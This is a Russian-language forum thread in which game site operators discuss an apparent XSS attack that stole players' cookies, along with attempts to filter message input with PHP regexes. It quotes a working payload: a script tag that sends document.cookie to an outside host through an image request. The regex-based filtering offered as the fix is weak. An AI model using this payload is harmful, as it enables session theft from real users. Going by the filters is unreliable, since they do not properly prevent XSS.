Я не увидел второго кода прост. )
rnddev, Скорее всего XSS. Так как при выводе document.cookie, отображаются только куки привязанные к домену, на котором находится пользователь
[мошенник] Смотрите он отправил <script>img = new Image(); img.src = "http://httpz.org/nufw40hn94p.gif?"+document.cookie;</script> и видимо получил куки? А дальше зашёл на страницу
Добавлено 18.07.14 в 13:07:14:
Как сбросить все куки??? в игре или что рндев хелпни
[мошенник] artemas, да именно так.
[мошенник] rnddev, а можно как-то очистить все игрокам из бд куки?
[мошенник] rnddev, как на проверку textarea поставить вот так будет пахать с техтареа нейм мсг
if (preg_match("#[a-z]+#ui", $_POST['msg']) && preg_match("#[а-я]+#ui", $_POST['msg'])){
$err=1;
err_game('Разрешается использовать символы только русского или только английского алфавита');
}
[мошенник] регулярка не правильная 
[мошенник] Может sess почистить?
[мошенник] rnddev, так напиши норм друг
[мошенник] preg_match('~^[а-яА-ЯёЁa-zA-Z0-9_/]+$~ui', $_POST['msg'])
